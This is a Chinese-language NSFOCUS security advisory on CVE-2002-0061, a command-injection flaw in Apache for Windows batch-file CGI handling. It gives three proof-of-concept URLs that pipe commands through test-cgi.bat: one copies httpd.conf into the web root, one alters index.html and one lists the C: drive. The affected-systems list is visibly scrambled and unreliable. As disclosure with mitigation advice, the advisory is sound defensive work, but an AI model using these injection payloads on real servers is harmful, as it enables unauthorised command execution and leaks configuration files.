首页 -> 安全研究
安全研究
安全漏洞
Apache Win32批处理文件远程执行命令漏洞
发布日期:2002-03-21
更新日期:2002-03-25
受影响系统:
Apache Group Apache 1.3.9win32不受影响系统:
Apache Group Apache 1.3.6win32
Apache Group Apache 1.3.11win32
Apache Group Apache 1.3.12win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.13win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.14win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.15win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.16win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.17win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.18win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.19win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.20win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.22win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.23win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 2.0.28-BETA win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 2.0.32-BETA win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
Apache Group Apache 1.3.24win32描述:
- Microsoft Windows XP Professional
Apache Group Apache 1.3.24win32
- Microsoft Windows XP Home
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP6a
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP6
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP5
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP4
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP3
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP2
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0 SP1
Apache Group Apache 1.3.24win32
- Microsoft Windows NT 4.0
Apache Group Apache 1.3.24win32
- Microsoft Windows 98
Apache Group Apache 1.3.24win32
- Microsoft Windows 95
Apache Group Apache 1.3.24win32
- Microsoft Windows 2000 SP3
Apache Group Apache 1.3.24win32
- Microsoft Windows 2000 Server SP2
Apache Group Apache 1.3.24win32
- Microsoft Windows 2000 Server SP1
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows XP Professional
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows XP Home
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP6a
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP6
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP5
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP4
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP3
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP2
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0 SP1
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows NT 4.0
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows 98
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows 95
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows 2000 SP3
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows 2000 Server SP2
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows 2000 Server SP1
BUGTRAQ ID: 4335
CVE(CAN) ID: CVE-2002-0061
Apache是使用最广泛的开放源码的Web服务器程序,分Unix和Windows两种发行版本。
Windows版本的Apache在处理批处理文件的Web请求没有过滤一些特殊字符(比如'|'),远程攻击者可以利用这个漏洞在目标主机执行任意命令。
Apache在Windows操作系统下一般都是以SYSTEM权限运行,所以会造成很大的危害。
2.0.x系列的Windows版Apache默认安装都自带了一个test的批处理文件,这个文件可以利用来执行命令。其它任意可以通过Web访问的批处理文件都可以利用。
<*来源:Ory Segal (ORY.SEGAL@SANCTUMINC.COM)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0270.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
这个请求将把conf目录下的httpd.conf拷贝到web目录htdocs。
2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
这个请求将给htdocs目录下的index.html文件添加字串"Foobar"。
3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt
这个请求将在htdocs目录下的建立一个C盘根目录列表的文件dir.txt。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 删除cgi-bin目录下所有批处理文件。
厂商补丁:
Apache Group
------------
目前1.3.24win32和2.0.34-BETA win32的发行版本已经修复这个安全问题,请到厂商的主页下载:
http://www.apache.org
浏览次数:4047
严重程度:0(网友投票)
绿盟科技给您安全的保障